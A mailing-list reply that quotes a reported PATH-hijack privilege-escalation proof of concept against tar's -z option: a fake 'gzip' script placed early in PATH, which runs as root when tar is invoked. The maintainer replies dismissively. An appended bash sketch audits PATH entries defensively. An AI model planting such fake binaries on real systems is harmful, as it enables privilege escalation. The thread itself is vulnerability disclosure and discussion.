
Re: Path Hijack vulnerability

From: Michał Górny
Subject: Re: Path Hijack vulnerability
Date: Wed, 03 Nov 2021 18:43:48 +0100
User-agent: Evolution 3.42.0

On Wed, 2021-11-03 at 15:21 +0100, Gregorio Giacobbe wrote:
> Hi!
> As per subject, I discovered a Path Hijack vulnerability in the tar binary. 
> When using the -z switch for gzip compression/decompression the binary calls 
> “gzip” without absolute path, hence allowing the path Hijack. 
> While this, in a normal scenario can be totally harmless, it can be used as a 
> privilege escalation technique when the tar binary is called as root user.
> Following lines will provide a basic PoC:
> ----
> export PATH=$(pwd):$PATH
> echo -e '#!/bin/bash\ntouch /tmp/tarred' > gzip
> chmod +x gzip
> touch file.txt
> tar -zcf backup.tar.gz file.txt
> ls -la /tmp/tarred 
> -rw-r--r-- 1 root root 0 Nov  3 14:05 /tmp/tarred
> ----
> I have not tested switches for other compression/decompression formats, so 
> there is a chance that they can be used as well as gzip.

Do you realize that if you have sufficient access to inject "gzip", you
may inject "tar" as well, right?

Best regards,
Michał Górny
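
Added example, not part of either message above: a check that a root-run script could perform before invoking tar -z. It walks PATH in lookup order and flags entries that would let a planted gzip, or a planted tar, be found first. TRUSTED_DIRS and both function names are assumptions made for this sketch.

```bash
# Added example, not from the thread. TRUSTED_DIRS and the function names
# are assumptions chosen for this sketch.
TRUSTED_DIRS="/usr/bin /bin /usr/sbin /sbin"

# Print why a PATH entry is risky; print nothing if it looks fine.
path_entry_risk() {
    local dir="$1"
    case "$dir" in
        "") echo "empty entry (current directory)"; return 0 ;;
        /*) ;;
        *)  echo "relative entry"; return 0 ;;
    esac
    [ -d "$dir" ] || return 0
    # "$dir/." follows a symlinked directory; -prune keeps find from descending.
    if [ -n "$(find "$dir/." -prune -perm -0002 2>/dev/null)" ]; then
        echo "world-writable directory"
    fi
}

# Walk a PATH string in lookup order until CMD is found, reporting each risky
# entry searched on the way. Returns 0 only if every entry searched is clean
# and the hit lives in a trusted directory.
audit_lookup() {
    local cmd="$1" rest="${2-$PATH}:" dir risk f status=0
    while [ -n "$rest" ]; do
        dir="${rest%%:*}"; rest="${rest#*:}"
        risk="$(path_entry_risk "$dir")"
        if [ -n "$risk" ]; then echo "RISK  '$dir': $risk"; status=1; fi
        f="${dir:-.}/$cmd"
        if [ -f "$f" ] && [ -x "$f" ]; then
            case " $TRUSTED_DIRS " in
                *" $dir "*) echo "OK    $cmd -> $f" ;;
                *) echo "RISK  $cmd -> $f (outside trusted directories)"; status=1 ;;
            esac
            return "$status"
        fi
    done
    echo "RISK  $cmd not found"; return 1
}

# The lookup that finds gzip also finds tar, so check both.
for c in tar gzip; do audit_lookup "$c" || true; done
```

The check covers only relative, empty and world-writable entries; directory ownership and group write permission are not examined.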
